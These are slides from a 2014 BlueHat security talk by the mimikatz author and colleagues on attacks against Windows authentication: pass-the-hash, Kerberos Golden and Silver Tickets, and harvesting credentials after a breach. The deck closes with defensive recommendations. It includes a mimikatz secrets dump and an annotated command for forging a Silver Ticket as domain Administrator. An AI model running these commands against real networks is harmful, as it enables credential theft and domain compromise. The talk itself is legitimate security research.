BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation

Reality Bites
The Attacker’s View of
Windows Authentication and Post-exploitation
Chris CAMPBELL `obscuresec`
Benjamin DELPY `gentilkiwi`
Skip DUCKWALL `passingthehash`

`whoami /groups` ?
Chris CAMPBELL - @obscuresec
– Pentester /Researcher / Former Army Red Team
– One of the authors of PowerSploit – PowerShell based post-exploitation toolkit
– Presented at Blackhat, Defcon, and more
Benjamin DELPY - @gentilkiwi
– Security researcher (the French guy with flashy Tahitian shirts)
– Author of mimikatz
– Presented at Black Hat, Defcon, PHDays, and more
Skip DUCKWALL - @passingthehash
– Pentester /Researcher / Former Army Red Team
– Patched pass-the-hash functionality into many tools used by pentesters
– Presented at Blackhat, Defcon, and more
10/10/2014 Chris, Ben & Skip @ BlueHat Reality Bites - The Attacker’s View of Windows Authentication and Post-exploitation 2

What we’re talking about
The world that exists outside Microsoft
Windows authentication in the real world
Popular attacks against Windows authentication in the
real world
mimikatz

One quick question?
Who won the Xbox One?
All three of us have asked a lot
–Even at MSRC ;)
So let’s use #askpth
–… for official hashtag of this talk!

The Idealistic View
Everybody runs the most up-to-date software
– All clients are Windows 8.1 / servers are 2012R2
– Domain / forest is at 2012R2 functional level
– All software is patched quickly
– Completely homogeneous Microsoft environment

A More Realistic View - Environment
Heterogeneous environments
Mix of Linux / Unix / Windows on the server side
– License costs prohibitive if not bundled with server hardware
– Virtualization makes spinning up new servers quick and easy
• license costs can grow quickly as well
Desktops are often a mix of various flavors of Windows
– Some OSX / Macs as well
Unix authentication sometimes integrated with Active Directory
– LDAP

The Realistic View - Patching
Patching is inconsistent
– Especially 3rd-party software
• Java / Acrobat Reader
Some services will be patched quickly
Some services on ‘don’t touch’ lists
Patching usually inversely proportional to the criticality of the system

The Realistic View - Desktop
Most enterprises are still transitioning from XP to Windows 7
– Licenses are expensive and often paired with hardware upgrades
None of the enterprises we’ve seen use 8.1
– Most enterprises have decided to see what happens with 10+ (XP approach)
Some places still have 2000 or NT and older
– See @Viss scan of the internet
– Shodan HQ

The Realistic View - Office
Mix of Office 2007 / 2010 in use
– with a lot of VBA ;)
Little incentive to upgrade
– Making stuff more “cloud capable” causes issues in many
enterprises
• 3rd party doctrine regarding information remaining private / confidential
• Ownership issues
• Technology has evolved, laws haven’t caught up

The Realistic View – Server OS
Many places still run 2003 domain functional level and are only now
transitioning to 2008 / 2008R2
Most Windows servers are running 2008 / 2008R2
Server 2003 being transitioned away from due to EOL
Server 2012 / 2012R2 has some traction
Criticality of server determines upgrades
– More critical , less likely

The Realistic View - Other Server Software
SQL server
– Whatever version the developer / app wanted to use when installed
– Usually multiple versions at the same time
– If the app works, little incentive to upgrade
Exchange
– 2007 or 2010
– Not a lot of incentive to upgrade since it’s viewed as critical infrastructure
SharePoint
– 2007 or 2010
– Not a lot of incentive to upgrade depending on usage

The Net Result?
New features for the latest software will not be present in
the average environment
Most enterprises will not regard a new security feature to be
worthy of upgrading the platform
It could be 5+ years before some features will be seen in the
average environment

Attackers in the Real World (1)
“Real World” attack knowledge suffers from research bias
– Sometimes we only find what we’re looking for
– Once we find something in the past, we tend to look for that first the next time
– New or novel attacks go unnoticed for years
Attackers are less interested in being disruptive
Attackers are more interested in gaining access to corporate data
– Domain / enterprise admin usually not the ultimate goal
– Usually a checkpoint along the way to find the people with access to the goods
– Possible with targeted attacks to never touch any privileged accounts
• Example: Target devs or HR

Most discovered attacks don’t involve 0-day exploits
– 0-days are expensive
– More difficult to discover post-attack
– Likely only required for hardened targets
Most breach responders overestimate their defensive
capabilities, therefore overestimate attacker capabilities

Client-side attacks combined with social engineering are the most
likely vectors
– Everybody clicks on dancing cats
– Email addresses are easy to collect or figure out
– Client-side vulnerabilities appear to be more plentiful
– Some products have come a long way : IE with EMET
– Some still have a ways to go : Java / Flash / Acrobat Reader
– Recentish breaches give attackers access to employee’s social networks
• Easier to create more legit looking context
Use an exploit to start then depend on bad architecture to work
deeper

After initial compromise, attackers will take their time on post-exploitation
– Targeted information sought
• Client lists
• Source Code
• Schematics
• Financial Information
• Credit card info / PII / PHI
• Private keys / certificates / code signing certs
Attackers usually have weeks to months
– Detection usually takes months based on the latest Verizon report
• http://www.verizonenterprise.com/DBIR/

Post-exploitation Techniques (1)
An entirely different talk
A few highlights
– Group Policy Preferences
• Anybody with access to DC could recover any credentials set with GPP
• Potentially allows elevation in automation scripts
• ~Patched with MS14-025
– Plaintext credentials in automation scripts
• Mount a share somewhere, copy stuff
– Service accounts
• Tend to be privileged with easy-to-guess passwords that haven’t changed in years

Post-exploitation Techniques (2)
Poorly configured file shares
– Password lists
• Search for ‘password.txt’
– Backups of critical infrastructure / configs
– Unattended installers
• If automagically joins the domain, means there’s a password somewhere
Poorly configured Sharepoint
– Use the search functionality to find password lists and config files

Post-exploitation Tools (1)
Attackers have a wide variety of tools they can use
Many are legit tools being used nefariously
– PowerShell
• Allows access to WINAPI / entire .NET framework
• Can be used to bypass even the most mature application whitelisting products
• Trivial AV bypass
– SysInternals
• Why not do ‘bad things’ with Microsoft signed binaries?
• PsExec, AdExplorer, ProcDump, and others

Post-exploitation Tools (2)
NT Resource Kit
– Many useful utilities that are now built-in commands
– sc, dnsquery, etc
– srvany – make any program a service
Built-in commands
– net.exe, cmd.exe, netsh.exe
Some tools are really only useful for post-exploitation
– mimikatz

mimikatz (1)
Designed by Benjamin to learn more about Windows programming
– Seriously
– We aren’t joking
Exposed several issues with plaintext passwords being stored in memory
– Passwords being stored in LSASS by various SSP
• WDigest and others
– Partially fixed by Microsoft
– Passwords will be back in LSASS if users need certain SSO
– Third party SSP still have access to passwords
• RSA for example
• mimikatz rolled its own as well

mimikatz (2)
Can recover keys / hashes for accounts in memory
Can be used to implement pass-the-hash attacks
– PTH = using hashes as password equivalents
– NTLM is DESIGNED this way
– Windows OS uses PTH
• NTLM service provider only stores the hash in memory
LM
NTLM (md4)
cc36cf7a8514893e
fccd332446158b1a
cc36cf7a8514893e
fccd332446158b1a

mimikatz (3)
Can be used to implement Kerberos attacks
– Can be used to recover a user’s Kerberos tickets
• Both TGTs and service tickets
– Can be used to insert tickets into LSASS for use
• Using a native Windows API
– Can be used to upgrade NTLM hash to a Kerberos ticket
• This is “overpass-the-hash”
• Introduced at Black Hat USA 2014
• Also works for recovered AES keys on the client side
for « chocolate.local » domain
des_cbc_md5
LSASS (kerberos)
rc4_hmac_nt
(NTLM/md4)
cc36cf7a8514893e
fccd332446158b1a
aes128_hmac
aes256_hmac
KD
C
KD
C
TGT
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
cc36cf7a8514893e
fccd332446158b1a
des_cbc_md5
LSASS (kerberos)
for « chocolate.local » domain
rc4_hmac_nt
(NTLM/md4)
aes128_hmac
aes256_hmac
KD
C
KD
C
TGT
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
TGT

Demo !
New version of mimikatz
in
New version of Windows
in
Front of Microsoft staff

mimikatz :: Golden Tickets (1)
Can be used to implement Golden Ticket attacks
– If KRBTGT hash/keys lost
• Domain dump
– Password audit (legitimate use case)
– Poorly redacted pentest report
• Other
– Compromise
– File backup of the domain controller
• Shadow copy trick
• Recovery of backup tapes or access to backup file share
– Compromise of virtual machine infrastructure
• Copy the drive image or a snapshot of the image

Made worse by KRBTGT rarely changing
– Only changes during domain functional upgrade
from NT5 -> NT6
– 2000/2003 to 2008/2012
• 2008 -> 2012 doesn’t change the value
• the previous one (n-1) still valid…
– Means the age of the hash on the average
operational environments is measured in YEARS

KRBTGT hash can be used to generate arbitrary TGTs for use
– Can make user a member of any group, even make it multiple users!
• Even users and SIDs that do not exist
– TGTs will only work for 20 minutes to get service tickets (however any service tickets will be good for 10
hours by default)
• Any account can create / used spoofed ticket, doesn’t require elevated rights
– Can be used to bypass account restrictions
• Disabled / expired
• Authentication silos
• “protected users” group is just a group SID in the TGT
– Create a trail of false events
• Incident handlers rely on event logs
• Easy to frame another user

Demo !

mimikatz :: BlackHat erratum
At BlackHat, we announced that to
forge a TGS, we need 2 keys
– krbtgt key
– target key
The krbtgt is needed to sign the PAC,
to avoid alterations
– But how a remote service can check this
signature without the Key ?
• Remember ? Kerberos is SYMETRIC
– Easy : it delegates PAC checks to the KDC…

mimikatz :: BlackHat erratum
Windows 2000 Server and Windows XP do not validate the PAC when the
application server is running under the local system context or has SeTcbPrivilege
[…]
Windows Server 2003 does not validate the PAC when the application server is
running under the local system context, the network service context, or has
SeTcbPrivilege. […]
Windows Server 2003 with SP1 does not validate the PAC when the application
server is under the local system context, the network service context, the local
service context, or has SeTcbPrivilege privilege. […]
Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2
do not validate the PAC by default for services. Windows still validates the PAC
for processes that are not running as services. PAC validation can be enabled
when the application server is not running in the context of local system, network
service, or local service; or it does not have SeTcbPrivilege […]
http://msdn.microsoft.com/library/cc224027.aspx#id2

mimikatz :: Silver Tickets (1)
So “in real life”, TGS only need the target key… no classic services will check
signature…, let’s call them : Silver Tickets !
Default
lifetime
Minimum
number of
KDC accesses
Multiple
targets
Available
with
Smartcard
Realtime check for
restrictions
(account disabled, logon
hours...)
Protected Users
Check for Encryption
(RC4/AES)
Can be found in Is funky
Normal 42 days 2 Yes Yes Yes Yes n.a. No
Overpass-the-hash
(Pass-the-key)
42 days 2 Yes No Yes Yes
Active Directory
Client Memory
No
(ok, a l i ttle;))
Pass-the-Ticket
(TGT)
10 hours 1 Yes Yes No (20mn after) No Client Memory Yes
Pass-the-Ticket
(TGS)
10 hours 0 No Yes No No Client Memory Yes
Silver Ticket [30;60] days 0 No Yes No No n.a. Yes
Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!

How do we make a Silver Ticket ?
– Exactly such as a Golden Ticket, except the krbtgt key
– Target name (server FQDN)
– Service name
– We must have the “Target Key”
• From Client Memory
• From Active Directory (ok, we can make Golden Ticket ;)
• or... from the registry (even, offline !)
mimikatz # lsadump::secrets
Domain : CLIENT
SysKey : 5418b222b48866feea6f633efcf8417d
Policy subsystem is : 1.13
LSA Key(s) : 1, default {13e98d1c-c7d5-1099-6477-5dbbed69ec73}
[00] {13e98d1c-c7d5-1099-6477-5dbbed69ec73}
c2e2ee5bfeb6a4fd4f58ab8554c42a585a093b116ee8ce830ee227e0c31071a4
Secret : $MACHINE.ACC
cur/NTLM:1acf72e4e8a2d6209fe96920ff800110/text: ,QK@Y+i$ nA9BCcrRvnPsaWE/m3_h?U+U^3AL-LF!_
8y<2.xH>'^F;>OA.(9v9!(_[=51Pj_]YqKV!5`LIsk=*F`q-/dP:kP))bDhA'!2R/x#u=)O$2W0me

Before that, who cares about this computer password ?
– No… really ?
– Yeah, like for the krbtgt account
– At least, this time the password can change every 30 days...
• But the n-1 still valid (so [30;60 days])… and the password still works if not changed…
$MACHINE.ACC is the new krbtgt, localized to a computer
– And it’s in the registry
Silver ticket is the new Golden Ticket, localized to a target/service
When you use a Service Account linked to a Kerberized Service, it can be localized
to multiple targets (see SPN)
– A lot of chances that you can find it in registry too ;)

Kerberos services relies on SPN
– Nobody likes to setup SPN (like MIT Kerberos)
– that’s why Microsoft made it ~easy for you (like MIT Kerberos)
host SPN is not only for “host”, but is an alias for :
alerter appmgmt cisvc clipsrv browser dhcp
dnscache replicator eventlog eventsystem policyagent oakley
dmserver dns mcsvc fax msiserver ias
messenger netlogon netman netdde netddedsm nmagent
plugplay protectedstorage rasman rpclocator rpc rpcss
remoteaccess rsvp samss scardsvr scesrv seclogon
scm dcom cifs spooler snmp schedule
tapisrv trksvr trkwks ups time wins
www http w3svc iisadmin msdtc

kerberos::golden
/domain:blue.local <= domain name
/sid:S-1-5-21-4174036629-1679296857-797215250 <= domain SID
/rc4:1acf72e4e8a2d6209fe96920ff800110 <= NTLM/RC4 of the Target/Service
/target:client.blue.local <= Target FQDN
/service:cifs <= Service name
/user:Administrator <= username you wanna be
/id:500 <= RID of username (500 is THE domain admin)
/groups:513,512,520,518,519 <= Groups list of the user (be imaginative)
/ticket:cifs.client.kirbi <= the ticket filename (or /ptt)

Demo !
New version of mimikatz
in
New version of Windows
in
Front of Microsoft staff
with
new features

mimikatz :: Bonus
Mimikatz is full of love for pentesters, but we can’t show all!
– We are modest
A little driver to bypass Protected Process
– Avoid RunAsPPL for LSASS by example
AddSid
– An experimental function to add SID of users/groups to another one user in Active Directory (admin
without admin group)
Thinking that PIN code and Picture password are better?
– You’ve a l33t company, you use Fingerprints in Windows 8?
– Password are in the local vault of the SYSTEM… you know ? The same with the password in registry…
mimilib & memssp
– Grab all passwords!

Demo !

Do Smart Cards Help? (1)
With Windows Auth, not really
– High cost
– Painful deployment
– Other benefits (email certs, ID certs for web servers)
Password hashes are randomly generated and stored
– They never change by default
– Useful for PTH
– Password could still be reset
• One location set the password after smart card enrollment to the same password for all users
(thousands)
– NTLM hash stored in Kerberos ticket

Do Smart Cards Help? (2)
Smart cards are only required for INTERACTIVE logon
– Second factor null and void for network logons
– File shares, etc
Smart cards are considered a stronger form of authentication
– means that somebody could launch a password guessing attack against the
account, possibly lock it
– Account is silently unlocked with a successful smart card login
– User never notified
– Even with that, it gives to the user… Kerberos tickets… usable without SC.

What does a compromise really mean?
Need to be honest with ourselves:
– A domain CANNOT BE RECOVERED once it is COMPROMISED
• … but very few people can detect when their domain is compromised
– How does “assume breach” mentality collide with the “10 Immutable Laws
of Security”?
– Education
• If this is the new stance, step up and release actionable guidance for strategic
decision makers
– C-Level
– Security Managers

Next Steps (1)
Not all technical
– Educational
– Strategic
Must give client the real keys to make the transition easy
– Disabling NTLM has been an option for a long time, but who cares?
• That and people like devices like printers and scanners that use network authentication
– WDigest can be disabled on Windows 7, but who will push the fixit?
– Using CNG or Virtual Smart Cards too, but who cares?
• Most products are not compatible

Next Steps (2)
Good security must not be a hard option to set AFTER compromise
Give sysadmins / blue teams tools for serious monitoring (eventlog is very NT4)
– Recent addition of command line auditing is a good first step, what’s next?
Enhance admin tools to securely manage large deployments
– Provide a secure method for managing local users across an enterprise
– One of the appeals of GPP was user management, although poorly implemented/insecure
Service / feature minimization
– Unix has done this for years
– If you don’t need a feature, make it so it can be easily disable / removed
– Issue guidance on what features are required and how to disable those that aren’t

Next Steps (3)
Design services that are breach-resistant
– Advice can’t be to rebuild the forest every day / week
– Design services that are more “tamper evident”
• Alert defenders if key services are touched
• Develop interesting methods to detect things like the Kerberos attacks
Authentication is hard
– If we had the solution, we’d be rich
– Requires active research
• Not a one-size-fits-all solution
• Local authentication != cloud authentication
• Room for many solutions

Next Steps (4)
Asymmetric encryption might be the answer?
– Key exchange is always the problem
• Figure this one out and you might have a way forward
Hardware integration?
– Critical credentials stored on a crypto chip that is tied to a particular
computer?
Third Party Support
– Accept the fact that most environments are heterogeneous
– Printers / Scanners / Future devices need to authenticate
– Develop proactive solutions for authentication, document and share

Next Steps (5)
Minimize and learn from previous mistakes
– NTLM weakness = hash is password equivalent
– AES keys are treated the same way currently in Windows
• Recover AES keys, get Kerberos ticket, win
– Kerberos design weaknesses have been well documented since 1990s
• Designed to minimize authentication traffic / load, not necessarily for security /
robustness

Next Steps (6)
Break with the past
– Backwards compatibility will always get you
– At some point in time you have to put it out of your misery
Remember that solution can’t be Microsoft only
– Printers / scanners / etc. need to be able to interact as well
– Design for future network needs as well

Defensive Measures
It’s difficult to get everything correct
– Old adage: Defenders have to be right all the time, attackers only have to be
right once
– Try to move towards “secure by default” or “fail closed”
• Or at least give enterprises the capability to do so if they choose to
Best measures are usually detective
– Know what normal looks like for privileged users
– Spot the abnormalities
• Defensive staff knows when an admin is on vacation or off shift
– Enhance auditing capabilities and increase alerting

That’s all Folks!
We would specially thanks:
– Will Peteroy
– Joe Bialek
– Akila Srinivasan
– 80’s (first versions of Kerberos)
– 90’s (first versions of NTLM)
– All (previous?) architects of Microsoft for making it possible
Seriously, we know it’s hard to change things in Security with retro
compatibility and business in the balance !

Websites, Source Codes & Contact
blog http://obscuresecurity.blogspot.com
source https://github.com/obscuresec
contact @obscuresec / obscuresec@gmail.com
blog http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source https://github.com/gentilkiwi/mimikatz
contact @gentilkiwi / benjamin@gentilkiwi.com
blog http://passing-the-hash.blogspot.com
source https://github.com/gentilkiwi/mimikatz
contact @passingthehash / exorcyst@gmail.com

BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation

Similar to BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation (20)

More from Benjamin Delpy

More from Benjamin Delpy (6)

Recently uploaded

Recently uploaded (20)

BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation